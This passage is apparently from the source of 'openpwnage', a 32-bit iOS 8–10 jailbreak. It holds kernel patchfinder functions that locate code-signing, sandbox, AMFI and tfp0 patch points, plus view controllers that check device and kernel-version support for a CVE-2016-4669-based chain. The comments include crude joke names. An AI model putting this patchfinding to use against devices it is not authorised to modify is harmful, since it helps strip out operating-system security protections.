339 |         if (*(uint64_t*)&kdata[i] == 0x0000f8dabf1e2800 && *(uint32_t*)&kdata[i+0x8] == 0x0004f040) {
340 |             uint32_t substrate2 = i + 0x16 - 0x49000;
341 |             printf("[*] found substrate2: 0x%08x\n", substrate2);
342 |             return substrate2;
343 |         }
344 |     }
345 |     return -1;
346 | }
347 | 
348 | uint32_t* find_substrate1_and_2(uint32_t region, uint8_t* kdata, size_t ksize, char* version) {
349 |     uint32_t* one_and_two = malloc(2 * sizeof(uint32_t));
350 |     for (uint32_t i = 0; i < ksize; i++) {
351 |         if (*(uint64_t*)&kdata[i] == 0x0000f8dabf1e2800 && *(uint32_t*)&kdata[i+0x8] == 0x0004f040) {
352 |             uint32_t substrate1 = i + 0x2 - 0x49000;
353 |             uint32_t substrate2 = i + 0x16 - 0x49000;
354 |             one_and_two[0] = substrate1;
355 |             one_and_two[1] = substrate2;
356 |             printf("[*] found substrate1: 0x%08x\n", substrate1);
357 |             printf("[*] found substrate2: 0x%08x\n", substrate2);
358 |             return one_and_two;
359 |         }
360 |     }
361 |     return NULL;
362 | }
363 | 
364 | uint32_t find_proc_enforce(uint32_t region, uint8_t* kdata, size_t ksize) {
365 |     // adapted from daibutsu pf
366 |     char* proc_enforce_description = memmem(kdata, ksize, "Enforce MAC policy on process operations", strlen("Enforce MAC policy on process operations"));
367 |     if (!proc_enforce_description)
368 |         return -1;
369 |     
370 |     uint32_t proc_enforce_description_address = region + ((uintptr_t)proc_enforce_description - (uintptr_t)kdata);
371 |     char* proc_enforce_description_ptr = memmem(kdata, ksize, (char*)&proc_enforce_description_address, sizeof(proc_enforce_description_address));
372 |     if (!proc_enforce_description_ptr)
373 |         return -1;
374 |     
375 |     uint32_t* proc_enforce_ptr = (uint32_t*)(proc_enforce_description_ptr - (5 * sizeof(uint32_t)));
376 |     uint32_t proc_enforce = *proc_enforce_ptr - region;
377 |     
378 |     olog("[*] proc_enforce: 0x%08x\n", proc_enforce);
379 |     
380 |     return proc_enforce;
381 | }
382 | 
383 | uint32_t find_vm_fault_enter_patch(uint32_t region, uint8_t* kdata, size_t ksize) {
384 |     const struct find_search_mask search_masks[] = {
385 |         {0xF800, 0x6800}, // LDR R2, [Ry,#X]
386 |         {0xF8FF, 0x2800}, // CMP Rx, #0
387 |         {0xFF00, 0xD100}, // BNE x
388 |         {0xFBF0, 0xF010}, // TST.W Rx, #0x200000
389 |         {0x0F00, 0x0F00},
390 |         {0xFF00, 0xD100}, // BNE x
391 |         {0xFFF0, 0xF400}, // AND.W Rx, Ry, #0x100000
392 |         {0xF0FF, 0x1080}
393 |     };
394 |     
395 |     uint16_t* insn = find_with_search_mask(region, kdata, ksize, sizeof(search_masks) / sizeof(*search_masks), search_masks);
396 |     if (!insn)
397 |         return 0;
398 |     
399 |     uint32_t vm_fault_enter_patch = ((uintptr_t)insn) - ((uintptr_t)kdata);
400 |     olog("[*] found vm_fault_enter_patch: 0x%08x\n", vm_fault_enter_patch);
401 |     
402 |     return vm_fault_enter_patch;
403 | }
404 | 
405 | uint32_t find_vm_map_enter_patch(uint32_t region, uint8_t* kdata, size_t ksize) {
406 |     const struct find_search_mask search_masks_90[] = {
407 |         {0xFFF0, 0xF010}, // TST.W Rz, #4
408 |         {0xFFFF, 0x0F04},
409 |         {0xFF78, 0x4600}, // MOV Rx, R0 (?)
410 |         {0xFFF0, 0xBF10}, // IT NE (?)
411 |         {0xFFF0, 0xF020}, // BICNE.W         Rk, Rk, #4
412 |         {0xF0FF, 0x0004}
413 |     };
414 |     
415 |     const struct find_search_mask search_masks_84[] = {
416 |         {0xFFF0, 0xF000}, // AND.W Rx, Ry, #2
417 |         {0xF0FF, 0x0002},
418 |         {0xFFF0, 0xF010}, // TST.W Rz, #2
419 |         {0xFFFF, 0x0F02},
420 |         {0xFF00, 0xD000}, // BEQ   loc_xxx
421 |         {0xF8FF, 0x2000}, // MOVS  Rk, #0
422 |         {0xFFF0, 0xF010}, // TST.W Rz, #4
423 |         {0xFFFF, 0x0F04}
424 |     };
425 | 
426 |     const struct find_search_mask search_masks[] = {
427 |         {0xFBE0, 0xF000},
428 |         {0x8000, 0x0000},
429 |         {0xFFF0, 0xF010},
430 |         {0xFFFF, 0x0F02},
431 |         {0xFF00, 0xD000},
432 |         {0xF8FF, 0x2000},
433 |         {0xFFF0, 0xF010},
434 |         {0xFFFF, 0x0F04}
435 |     };
436 | 
437 |     uint16_t* insn = find_with_search_mask(region, kdata, ksize, sizeof(search_masks_90) / sizeof(*search_masks_90), search_masks_90);
438 |     if (!insn)
439 |         insn = find_with_search_mask(region, kdata, ksize, sizeof(search_masks) / sizeof(*search_masks), search_masks);
440 |     if (!insn) {
441 |         insn = find_with_search_mask(region, kdata, ksize, sizeof(search_masks_84) / sizeof(*search_masks_84), search_masks_84);
442 |         if (!insn)
443 |             return 0;
444 |         insn += 2;
445 |         uint32_t vm_map_enter_patch = ((uintptr_t)insn) - ((uintptr_t)kdata);
446 |         olog("[*] found vm_map_enter_patch: 0x%08x\n", vm_map_enter_patch);
447 |         
448 |         return vm_map_enter_patch;
449 |     }
450 |     
451 |     insn += 4;
452 |     uint32_t vm_map_enter_patch = ((uintptr_t)insn) - ((uintptr_t)kdata);
453 |     olog("[*] found vm_map_enter_patch: 0x%08x\n", vm_map_enter_patch);
454 |     
455 |     return vm_map_enter_patch;
456 | }
457 | 
458 | uint32_t find_csops(uint32_t region, uint8_t* kdata, size_t ksize) {
459 |     const struct find_search_mask search_masks_90[] =
460 |     {
461 |         {0xFFF0, 0xF100},
462 |         {0x0000, 0x0000},
463 |         {0xFF80, 0x4600},
464 |         {0xFC00, 0xF400},
465 |         {0x0000, 0x0000},
466 |         {0xFFF0, 0xF890},
467 |         {0x0000, 0x0000},
468 |         {0xFFF0, 0xF010},
469 |         {0xFFFF, 0x0F01},
470 |         {0xF800, 0xD000},
471 |     };
472 |     
473 |     const struct find_search_mask search_masks[] =
474 |     {
475 |         {0xFC00, 0xF400},
476 |         {0x0000, 0x0000},
477 |         {0xF800, 0xE000},
478 |         {0x0000, 0x0000},
479 |         {0xFFF0, 0xF100},
480 |         {0x0000, 0x0000},
481 |         {0xFF80, 0x4600},
482 |         {0xF800, 0xF000},
483 |         {0x0000, 0x0000},
484 |         {0xFF80, 0x4600},
485 |         {0xFFF0, 0xF890},
486 |         {0x0000, 0x0000},
487 |         {0xFFF0, 0xF010},
488 |         {0xFFFF, 0x0F01},
489 |         {0xFC00, 0xF000},
490 |         {0x0000, 0x0000}
491 |     };
492 | 
493 |     uint16_t* insn = find_with_search_mask(region, kdata, ksize, sizeof(search_masks_90) / sizeof(*search_masks_90), search_masks_90);
494 |     if (!insn) {
495 |         insn = find_with_search_mask(region, kdata, ksize, sizeof(search_masks) / sizeof(*search_masks), search_masks);
496 |         if (!insn)
497 |             return 0;
498 |         insn += 14;
499 |     }
500 |     else
501 |         insn += 9;
502 |     
503 |     uint32_t csops = ((uintptr_t)insn) - ((uintptr_t)kdata);
504 |     olog("[*] found csops: 0x%08x\n", csops);
505 |     
506 |     return csops;
507 | }
508 | 
509 | uint32_t find_mapForIO(uint32_t region, uint8_t* kdata, size_t ksize) {
510 |     for (uint32_t i = 0; i < ksize; i++) {
511 |         if (*(uint64_t*)&kdata[i] == 0xf010798044406da0 && *(uint32_t*)&kdata[i+0x8] == 0xd0060f01 && *(uint16_t*)&kdata[i+0xC] == 0x4620) {
512 |             uint32_t mapForIO = i - 4;
513 |             olog("[*] found mapForIO: 0x%08x\n", mapForIO);
514 |             return mapForIO;
515 |         }
516 |     }
517 |     return -1;
518 | }
519 | 
520 | uint32_t find_sandbox_call_i_can_has_debugger(uint32_t region, uint8_t* kdata, size_t ksize) {
521 |     const struct find_search_mask search_masks_90[] =
522 |     {
523 |         {0xFFFF, 0xB590}, // PUSH {R4,R7,LR}
524 |         {0xFFFF, 0xAF01}, // ADD  R7, SP, #4
525 |         {0xFFFF, 0x2000}, // MOVS R0, #0
526 |         {0xFFFF, 0x2400}, // MOVS R4, #0
527 |         {0xF800, 0xF000}, // BL   i_can_has_debugger
528 |         {0xD000, 0xD000},
529 |         {0xFD07, 0xB100}  // CBZ  R0, loc_xxx
530 |     };
531 | 
532 |     const struct find_search_mask search_masks[] =
533 |     {
534 |         {0xFFFF, 0xB590}, // PUSH {R4,R7,LR}
535 |         {0xFFFF, 0x2000}, // MOVS R0, #0
536 |         {0xFFFF, 0xAF01}, // ADD  R7, SP, #4
537 |         {0xFFFF, 0x2400}, // MOVS R4, #0
538 |         {0xF800, 0xF000}, // BL   i_can_has_debugger
539 |         {0xD000, 0xD000},
540 |         {0xFD07, 0xB100}  // CBZ  R0, loc_xxx
541 |     };
542 | 
543 |     uint16_t* ptr = find_with_search_mask(region, kdata, ksize, sizeof(search_masks_90) / sizeof(*search_masks_90), search_masks_90);
544 |     if (!ptr) {
545 |         printf("[*] not 90...\n");
546 |         ptr = find_with_search_mask(region, kdata, ksize, sizeof(search_masks) / sizeof(*search_masks), search_masks);
547 |     }
548 |     if (!ptr)
549 |         return 0;
550 | 
551 |     uint32_t sandbox_call_i_can_has_debugger = (uintptr_t)ptr + 8 - ((uintptr_t)kdata);
552 |     olog("[*] found sandbox_call_i_can_has_debugger: 0x%08x\n", sandbox_call_i_can_has_debugger);
553 |     
554 |     return sandbox_call_i_can_has_debugger;
555 | }
556 | 
557 | // literally just the og patchfinder function but with char* version, which is unused, but is there because of old patches lol
558 | // actually minor changes were made
559 | // the return otherwise nah
560 | uint32_t find_amfi_file_check_mmap(uint32_t region, uint8_t* kdata, size_t ksize) {
561 | #if 0
562 |     uint8_t* hook_execve = memmem(kdata, ksize, "AMFI: hook..execve() killing pid %u: %s\n", sizeof("AMFI: hook..execve() killing pid %u: %s\n"));
563 |     //printf("%x\n", hook_execve - kdata);
564 |     if (!hook_execve)
565 |         return 0;
566 |     
567 |     // Find a reference to the "AMFI: hook..execve() killing pid ..." string.
568 |     uint16_t* ref = find_literal_ref(region, kdata, ksize, (uint16_t*) kdata, (uintptr_t)hook_execve - (uintptr_t)kdata);
569 |     //printf("%x\n", (uint8_t*)ref - kdata);
570 |     if (!ref)
571 |         return 0;
572 | 
573 |     uint32_t amfi_off = (uintptr_t)ref - (uintptr_t)kdata;
574 | #endif
575 |     
576 |     uint8_t* rootless = memmem(kdata, ksize, "com.apple.rootless.install", sizeof("com.apple.rootless.install"));
577 |     //printf("%x\n", (uint8_t*)rootless - kdata);
578 |     if (!rootless)
579 |         return 0;
580 |     
581 |     // Find a reference to the "com.apple.rootless.install" string.
582 |     uint16_t* ref = find_literal_ref(region, kdata, ksize, (uint16_t*) kdata, (uintptr_t)rootless - (uintptr_t)kdata);
583 |     //printf("%x\n", (uint8_t*)ref - kdata);
584 |     if (!ref)
585 |         return 0;
586 |     
587 | #if 0
588 |     uint32_t rootless_off = (uintptr_t)ref - (uintptr_t)kdata;
589 |     if (amfi_off > rootless_off ||
590 |        (amfi_off + 0x800) < rootless_off)
591 |     {
592 |         rootless = memmem(kdata+rootless_off, ksize-rootless_off, "com.apple.rootless.install", sizeof("com.apple.rootless.install"));
593 |         if (!rootless)
594 |             return 0;
595 |         
596 |         // Re-Find a reference to the "com.apple.rootless.install" string.
597 |         ref = find_literal_ref(region, kdata, ksize, (uint16_t*) kdata, (uintptr_t)rootless - (uintptr_t)kdata);
598 |         //printf("%x\n", (uint8_t*)ref - kdata);
599 |         if (!ref)
600 |             return 0;
601 |         rootless_off = (uintptr_t)ref - (uintptr_t)kdata;
602 |     }
603 | #endif
604 |     
605 |     int i=0;
606 |     while (1){
607 |         if (i>16)
608 |             return 0;
609 |         if ((ref[i] & 0xfff0) == 0xbf10) // it ne
610 |             break;
611 |         i++;
612 |     }
613 |     
614 |     ref += (i-1);
615 |     
616 |     uint32_t amfi_file_check_mmap = (uintptr_t)ref - (uintptr_t)kdata;
617 |     olog("[*] found amfi_file_check_mmap: 0x%08x\n", amfi_file_check_mmap);
618 |     
619 |     return amfi_file_check_mmap;
620 | }
621 | 
622 | uint32_t find_allproc(uint32_t region, uint8_t* kdata, size_t ksize, char* version) {
623 |     // XXX: TODO
624 |     uint32_t allproc = 0x45717c;
625 |     olog("[*] found allproc: 0x%08x\n", allproc);
626 |     return allproc;
627 | }
628 | 
629 | uint32_t find_tfp0(uint32_t region, uint8_t* kdata, size_t ksize, char* version) {
630 |     for (uint32_t i = 0; i < ksize; i++) {
631 |         if (*(uint16_t*)&kdata[i] == 0x4630 && *(uint64_t*)&kdata[i + 6] == 0xf0000f00f1ba4682 && *(uint32_t*)&kdata[i + 0x10] == 0xf0014650) {
632 |             // jesus christ john, this is ugly as FUCK
633 |             for (int a = i; a > (i - 0x30); a -= 2) {
634 |                 if (*(uint16_t*)&kdata[a] == 0xb5f0) {
635 |                     for (int e = a; e < (a + 0x20); e += 2) {
636 |                         if (*(uint16_t*)&kdata[e] == 0x2e00) {
637 |                             uint32_t tfp0 = e + 0x4;
638 |                             olog("[*] found tfp0: 0x%08x\n", tfp0);
639 |                             return tfp0;
640 |                         }
641 |                     }
642 |                 }
643 |             }
644 |         }
645 |     }
646 |     return -1;
647 | }
648 | 
649 | uint32_t find_sbops(uint32_t region, uint8_t* kdata, size_t ksize) {
650 |     char* seatbelt_sandbox_policy = memmem(kdata,
651 |                                            ksize,
652 |                                            "Seatbelt sandbox policy",
653 |                                            strlen("Seatbelt sandbox policy"));
654 |     olog("[*] seatbelt_sandbox_policy 0x%08lx\n",
655 |            (uintptr_t)seatbelt_sandbox_policy);
656 |     if (!seatbelt_sandbox_policy)
657 |         return -1;
658 |     
659 |     uint32_t seatbelt =   (uintptr_t)seatbelt_sandbox_policy
660 |                         - (uintptr_t)kdata
661 |                         + region;
662 |     olog("[*] seatbelt: 0x%08x\n", seatbelt);
663 |     
664 |     char* seatbelt_sandbox_policy_ptr = memmem(kdata,
665 |                                                ksize,
666 |                                                (char*)&seatbelt,
667 |                                                sizeof(seatbelt));
668 |     
669 |     olog("[*] seatbelt_sandbox_policy_ptr 0x%08lx\n",
670 |            (uintptr_t)seatbelt_sandbox_policy_ptr);
671 |     if (!seatbelt_sandbox_policy_ptr)
672 |         return -1;
673 |     
674 |     uint32_t ptr_to_seatbelt =   (uintptr_t)seatbelt_sandbox_policy_ptr
675 |                                - (uintptr_t)kdata;
676 |     uint32_t sbops = ptr_to_seatbelt + 0x24;
677 |     olog("[*] found sbops: 0x%08x\n", sbops);
678 |     
679 |     return sbops;
680 | }
681 | 
682 | uint32_t find_mount_common(uint32_t region, uint8_t* kdata, size_t ksize) {
683 |     char *version = (char*)[[[UIDevice currentDevice] systemVersion]
684 |                      UTF8String];
685 |     float version_float = strtof(version, 0);
686 |     for (uint32_t i = 0; i < ksize; i++) {
687 |         if (version_float == (float)9.3) {
688 |             if (*(uint64_t*)&kdata[i] == 0x2501d1030f01f01b && *(uint32_t*)&kdata[i+0x8] == 0x2501e016) {
689 |                 uint32_t mount_common = i + 0x5;
690 |                 printf("[*] found mount_common: 0x%08x\n", mount_common);
691 |                 return mount_common;
692 |             }
693 |         } else if (version_float == (float)9.0) {
694 |             if ((*(uint64_t*)&kdata[i] & 0x00ffffffffffffff) == 0xd4d0060f01f010) {
695 |                 uint32_t mount_common = i + 0x5;
696 |                 printf("[*] found mount_common: 0x%08x\n", mount_common);
697 |                 return mount_common;
698 |             }
699 |         } else {
700 |             if (*(uint32_t*)&kdata[i] == 0x0f01f010 && *(uint8_t*)&kdata[i+0x5] == 0xd0 && *(uint32_t*)&kdata[i+0xe] == 0x0f40f010 && *(uint8_t*)&kdata[i+0x13] == 0xd0) {
701 |                 uint32_t mount_common = i + 0x5;
702 |                 printf("[*] found mount_common: 0x%08x\n", mount_common);
703 |                 return mount_common;
704 |             }
705 |         }
706 |     }
707 |     return -1;
708 | }
709 | 
710 | uint32_t find_cs_enforcement_disable_amfi(uint32_t region, uint8_t* kdata, size_t ksize) {
711 |     char* amfi = memmem(kdata, ksize, "com.apple.driver.AppleMobileFileIntegrity", strlen("com.apple.driver.AppleMobileFileIntegrity"));
712 |     uint32_t cs_enforcement_disable_amfi = (uintptr_t)amfi - (uintptr_t)kdata + 0xb1;
713 |     printf("[*] cs_enforcement_disable_amfi: 0x%08x\n", cs_enforcement_disable_amfi);
714 |     return cs_enforcement_disable_amfi;
715 | }
716 | 


--------------------------------------------------------------------------------
/openpwnage/SettingsViewController.h:
--------------------------------------------------------------------------------
 1 | //
 2 | //  SettingsViewController.h
 3 | //  openpwnage
 4 | //
 5 | //  Created by Zachary Keffaber on 5/26/22.
 6 | //
 7 | 
 8 | #import <UIKit/UIKit.h>
 9 | 
10 | @interface SettingsViewController : UIViewController
11 | 
12 | 
13 | @end
14 | 


--------------------------------------------------------------------------------
/openpwnage/SettingsViewController.m:
--------------------------------------------------------------------------------
 1 | //
 2 | //  SettingsViewController.m
 3 | //  openpwnage
 4 | //
 5 | //  Created by Zachary Keffaber on 5/26/22.
 6 | //
 7 | 
 8 | #import "SettingsViewController.h"
 9 | 
10 | @interface SettingsViewController ()
11 | 
12 | @end
13 | 
14 | @implementation SettingsViewController
15 | 
16 | - (void)viewDidLoad {
17 |     [super viewDidLoad];
18 |     // Do any additional setup after loading the view.
19 | }
20 | 
21 | - (IBAction)remountFSSwitch:(id)sender {
22 |     
23 | }
24 | - (IBAction)TweakInjectionSwitch:(id)sender {
25 |     if ([sender isOn]) {
26 |         NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, NSUserDomainMask, YES);
27 |         NSString *documentsDirectory = [paths objectAtIndex:0];
28 |         NSString *filename = [documentsDirectory stringByAppendingPathComponent:@"disabletweakinjection.txt"];
29 |     }
30 | }
31 | 
32 | @end
33 | 


--------------------------------------------------------------------------------
/openpwnage/ViewController.h:
--------------------------------------------------------------------------------
 1 | //
 2 | //  ViewController.h
 3 | //  openpwnage
 4 | //
 5 | //  Created by Zachary Keffaber on 4/20/22.
 6 | //
 7 | 
 8 | #import <UIKit/UIKit.h>
 9 | #include <mach/mach.h>
10 | #include <sys/utsname.h>
11 | 
12 | @interface ViewController : UIViewController
13 | @property (nonatomic, retain) IBOutlet UITextView *consoleView;
14 | void openpwnageCLog(NSString* textToLog);
15 | uintptr_t kbase(void);
16 | task_t get_kernel_task(void);
17 | void exploit_cleanup(task_t);
18 | @end
19 | 


--------------------------------------------------------------------------------
/openpwnage/ViewController.m:
--------------------------------------------------------------------------------
  1 | //
  2 | //  ViewController.m
  3 | //  openpwnage
  4 | //
  5 | //  Created by Zachary Keffaber on 4/20/22.
  6 | //
  7 | 
  8 | #import "ViewController.h"
  9 | #import <sys/utsname.h>
 10 | #include <sys/sysctl.h>
 11 | #include <sys/types.h>
 12 | 
 13 | #import "jailbreak.h"
 14 | #import "sock_port/exploit.h"
 15 | #include <time.h>
 16 | #include "sock_port/pf10.h"
 17 | 
 18 | #define UNSLID_BASE 0x80001000
 19 | 
 20 | #define UIColorFromRGB(rgbValue) [UIColor \
 21 | colorWithRed:((float)((rgbValue & 0xFF0000) >> 16))/255.0 \
 22 | green:((float)((rgbValue & 0xFF00) >> 8))/255.0 \
 23 | blue:((float)(rgbValue & 0xFF))/255.0 alpha:1.0]
 24 | 
 25 | @interface ViewController ()
 26 | @property (weak, nonatomic) IBOutlet UILabel *openpwnLabel;
 27 | @property (weak, nonatomic) IBOutlet UILabel *notSupportedLabel;
 28 | @property (weak, nonatomic) IBOutlet UIButton *jbButton;
 29 | //@property (weak, nonatomic) IBOutlet UITextView *consoleView;
 30 | @property (weak, nonatomic) IBOutlet UIButton *settingsButton;
 31 | -(void)openpwnageConsoleLog:(NSString*)textToLog;
 32 | @end
 33 | 
 34 | @implementation ViewController
 35 | 
 36 | @synthesize consoleView;
 37 | 
 38 | id param_;
 39 | 
 40 | static id static_consoleView = nil;
 41 | -(void)viewDidLoad {
 42 |     [super viewDidLoad];
 43 |     param_ = self;
 44 |     [self setNeedsStatusBarAppearanceUpdate];
 45 |     // Do any additional setup after loading the view.
 46 |     _jbButton.layer.cornerRadius = 5.0;
 47 |     consoleView.layer.cornerRadius = 10.0;
 48 |     struct utsname systemInfo;
 49 |     uname(&systemInfo);
 50 |     NSDateFormatter *dateFormatter=[[NSDateFormatter alloc] init];
 51 |     [dateFormatter setDateFormat:@"MM-dd"];
 52 |     if ([[dateFormatter stringFromDate:[NSDate date]]isEqualToString:@"04-01"]){
 53 |         srand(time(0));
 54 |         int randjokenameid = (rand() % 17) + 1;
 55 |         if (randjokenameid == 1) {
 56 |             _openpwnLabel.text = @"mompwnage"; //zachary7829#9778 (me) (what i do to capt's mom each night)
 57 |         } else if (randjokenameid == 2) {
 58 |             _openpwnLabel.text = @"bozopwnage"; //hydrate#9351
 59 |         } else if (randjokenameid == 3) {
 60 |             _openpwnLabel.text = @"Manticore"; //Orangera1n#9957 holy shit it's reel
 61 |         } else if (randjokenameid == 4) {
 62 |             _openpwnLabel.text = @"nJailbreak"; //flower#1116
 63 |         } else if (randjokenameid == 5) {
 64 |             _openpwnLabel.text = @"Serenajb"; //Billie#0303
 65 |         } else if (randjokenameid == 6) {
 66 |             _openpwnLabel.text = @"flowerbreak"; //flower#1116
 67 |         } else if (randjokenameid == 7) {
 68 |             _openpwnLabel.text = @"Stendra"; //Dan(infinity synbol that i can't type)#9999 coolstar trol
 69 |         } else if (randjokenameid == 8) {
 70 |             _openpwnLabel.text = @"ligmabreak"; //Neptune#6866
 71 |         } else if (randjokenameid == 9) {
 72 |             _openpwnLabel.text = @"MokitoCoreJB"; //Billie#0303
 73 |         } else if (randjokenameid == 10) {
 74 |             _openpwnLabel.text = @"Zer0Tw0Pwn"; //Neptune#6866
 75 |         } else if (randjokenameid == 11) {
 76 |             _openpwnLabel.text = @"pastcutsJB"; //flower#1116 (no way!!,,)
 77 |         } else if (randjokenameid == 12) {
 78 |             _openpwnLabel.text = @"BallsInYoJaws"; //Neptune#6866 erhoihgioer stop
 79 |         } else if (randjokenameid == 13) {
 80 |             _openpwnLabel.text = @"c0met14"; //Neptune#6866 holy shit iOS 14 jailbreak for iOS 8/9 I can't believe this
 81 |         } else if (randjokenameid == 14) {
 82 |             _openpwnLabel.text = @"CookieMonster"; //WhitetailAni#1287 holy shit iOS 14 jailbreak for iOS 8/9 I can't believe this
 83 |         } else if (randjokenameid == 15) {
 84 |             _openpwnLabel.text = @"im gay"; //not me i swear guys im not gay ,, but ,,,,
 85 |         } else if (randjokenameid == 16) {
 86 |             _openpwnLabel.text = @"FurryJB"; //furr rrr aw so cute rrr
 87 |         } else if (randjokenameid == 17) {
 88 |             _openpwnLabel.text = @"Estrogen"; // AWSOM!!
 89 |         }
 90 |     } else if ([[dateFormatter stringFromDate:[NSDate date]]isEqualToString:@"05-19"]){
 91 |         //when the first build of openpwnage was released. you get a ton of names i considered for a jailbreak, and i didn't want to waste them so I'm throwing them here
 92 |         srand(time(0));
 93 |         int randjokenameid = (rand() % 17) + 1;
 94 |         if (randjokenameid == 1) {
 95 |             _openpwnLabel.text = @"Bonobo"; //coming to a iPhone 2G 1.0-1.0.2 near you!
 96 |         } else if (randjokenameid == 2) {
 97 |             _openpwnLabel.text = @"Malaria"; //coming to a iPhone 4 near you!
 98 |         } else if (randjokenameid == 3) {
 99 |             _openpwnLabel.text = @"WinterSn0w"; //coming to a iPod Touch 1 iOS 1 near you!
100 |         } else if (randjokenameid == 4) {
101 |             _openpwnLabel.text = @"FurryJB"; //suck my cock
102 |         } else if (randjokenameid == 5) {
103 |             _openpwnLabel.text = @"BigshotJB"; //pretty cool jailbreak name tbh
104 |         } else if (randjokenameid == 6) {
105 |             _openpwnLabel.text = @"Vader"; //y'know, from like... star wars?
106 |         } else if (randjokenameid == 7) {
107 |             _openpwnLabel.text = @"EasyPwnage"; //the actual name sounds like so much better imo
108 |         } else if (randjokenameid == 8) {
109 |             _openpwnLabel.text = @"p0wdersn0w"; //huh this actually sounds like it could be the name of some old tethered/untethered jailbreak lol
110 |         } else if (randjokenameid == 9) {
111 |             _openpwnLabel.text = @"richman"; //i don't have anything to comment on this one sorry
112 |         } else if (randjokenameid == 10) {
113 |             _openpwnLabel.text = @"evil_jellyfish"; //used to really like this name, now, tbh sounds stupid
114 |         } else if (randjokenameid == 11) {
115 |             _openpwnLabel.text = @"Pepper"; //if i ever make a iOS 11 untether i'll call it Pepper. but I won't because who tf uses iOS 11 and it's not like i have any devices for it anyway
116 |         } else if (randjokenameid == 12) {
117 |             _openpwnLabel.text = @"milkman"; // MAN
118 |         } else if (randjokenameid == 13) {
119 |             _openpwnLabel.text = @"meguh4x"; // MEGUMIN MEGUMIN MEGYMIN MEGUMIN MEGUMININNNNNNNN (worship)
120 |         } else if (randjokenameid == 14) {
121 |             _openpwnLabel.text = @"Cherry"; // i don't even like cherries tbh not sure why i loved this name for so long
122 |         } else if (randjokenameid == 15) {
123 |             _openpwnLabel.text = @"newsc00by"; // scooby dooby doo where are you. maybe i got this name from listening to the WHAT'S NEW SCOOBY DOO theme some a million times as a kid. i don't remember anything from that show but that theme song slapped hard and still slaps hard now
124 |         } else if (randjokenameid == 16) {
125 |             _openpwnLabel.text = @"sn0wra1n"; // like WinterSn0w but less cool
126 |         } else if (randjokenameid == 17) {
127 |             _openpwnLabel.text = @"PonyJB"; // i am a brony
128 |         }
129 |     }
130 |     _settingsButton.hidden = 1;
131 |     
132 |     consoleView.text = [NSString stringWithFormat:@"[*]openpwnage running on %@ with iOS %@\n", [NSString stringWithCString:systemInfo.machine encoding:NSUTF8StringEncoding], [[UIDevice currentDevice] systemVersion]];
133 |     [_jbButton setImage:[UIImage imageNamed:@"openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.png"] forState:UIControlStateHighlighted];
134 |     [_jbButton setImage:[UIImage imageNamed:@"openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.png"] forState:UIControlStateSelected];
135 |     [_jbButton setImage:[UIImage imageNamed:@"openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.png"] forState:UIControlStateDisabled];
136 |     
137 |     size_t size;
138 |     sysctlbyname("kern.version", NULL, &size, NULL, 0);
139 |     char *kernelVersion = malloc(size);
140 |     sysctlbyname("kern.version", kernelVersion, &size, NULL, 0);
141 |     olog("%s\n",kernelVersion);
142 |     
143 |     char *newkernv = malloc(size - 44);
144 |     char *semicolon = strchr(kernelVersion, '~');
145 |     int indexofsemi = (int)(semicolon - kernelVersion);
146 |     int indexofrootxnu = indexofsemi;
147 |     while (kernelVersion[indexofrootxnu - 1] != '-') {
148 |         indexofrootxnu -= 1;
149 |     }
150 |     memcpy(newkernv, &kernelVersion[indexofrootxnu], indexofsemi - indexofrootxnu + 2);
151 |     newkernv[indexofsemi - indexofrootxnu + 2] = '\0';
152 |         
153 |     olog("Kernel Version: %s\n",newkernv);
154 |     
155 |     olog("openpwnage stage: Beta\n");
156 |     olog("openpwnage build 10\n");
157 |     
158 |     //olog("olog functional!");
159 |     
160 |     //remember to detect free space to check that the bootstrap can be installed
161 |     
162 |     NSArray *supportedDevices = [NSArray arrayWithObjects:@"iPad2,1",@"iPad2,2",@"iPad2,3",@"iPad2,4",@"iPad2,5",@"iPad2,6",@"iPad2,7",@"iPad3,1",@"iPad3,2",@"iPad3,3",@"iPad3,4",@"iPad3,5",@"iPad3,6",@"iPhone4,1",@"iPhone5,1",@"iPhone5,2",@"iPhone5,3",@"iPhone5,4",@"iPod5,1", nil];
163 |     //supports all 32bit devices on 9.0-9.3.6 (the kinfo leak works on 8.0-8.4.1 but the mach_ports_register() bug (CVE-2016-4669) doesn't), aka iPad 2, iPad Mini 1, iPad 3, iPad 4, iPhone 4S, iPhone 5, iPhone 5C, iPod Touch 5
164 |     if([supportedDevices containsObject:[NSString stringWithCString:systemInfo.machine encoding:NSUTF8StringEncoding]]){
165 |         NSString *kver = [NSString stringWithCString:newkernv encoding:NSUTF8StringEncoding];
166 |         NSArray *supportedKernVers = [NSArray arrayWithObjects:@"3789.70.16~4",@"3248.61.1~1",@"3248.60.9~1",@"3248.60.8~1",@"3248.60.4~1",@"3248.60.3~3",@"3248.50.21~4",@"3248.50.20~1",@"3248.50.18~1",@"3248.41.4~2",@"3248.41.4~3",@"3248.41.3~1",@"3248.40.173.0.1~1",@"3248.40.166.0.1~1",@"3248.40.155.1.1~3",@"3248.31.3~2",@"3248.21.2~1",@"3248.21.1~2",@"3248.20.39~8",@"3248.20.33.0.1~7",@"3248.10.42~4",@"3248.10.41~1",@"3248.10.38~3",@"3248.10.27~1",@"3248.1.3~1",@"3248.1.2~3",@"3247.1.88.1.1~1",@"3247.1.56~1",@"3247.1.36.0.1~9",@"3247.1.6.1.1~2",@"3216.0.0.1.15~2",@"2784.40.6~1",@"2784.30.7~3",@"2784.30.7~1", nil];
167 |         if (!([supportedKernVers containsObject:kver])) {
168 |             [self openpwnageConsoleLog:@"[*]your device is supported by openpwnage, but your iOS version is not\n"];
169 |             [self openpwnageConsoleLog:@"[*]openpwnage supports 32bit 8.4b4-10.3.4 only at the moment\n"];
170 |             _jbButton.hidden = 1;
171 |             consoleView.backgroundColor = UIColorFromRGB(0xF9c9c9);
172 |         } else {
173 |             _notSupportedLabel.hidden = 1;
174 |             if ([@"3789.70.16~4" isEqualToString:kver]) {
175 |                 olog("openpwnage support on 10.3.3b6/10.3.3 is not complete\n");
176 |             }
177 |             if ([[NSArray arrayWithObjects:@"2784.40.6~1",@"2784.30.7~3",@"2784.20.34~2",@"2784.30.7~1",@"2784.30.5~7",nil] containsObject:kver]) {
178 |                 //olog("openpwnage support on 8.X is not complete\n");
179 |             }
180 |         }
181 |     } else {
182 |         [self openpwnageConsoleLog:@"[*]your device is not supported by openpwnage\n"];
183 |         _jbButton.hidden = 1;
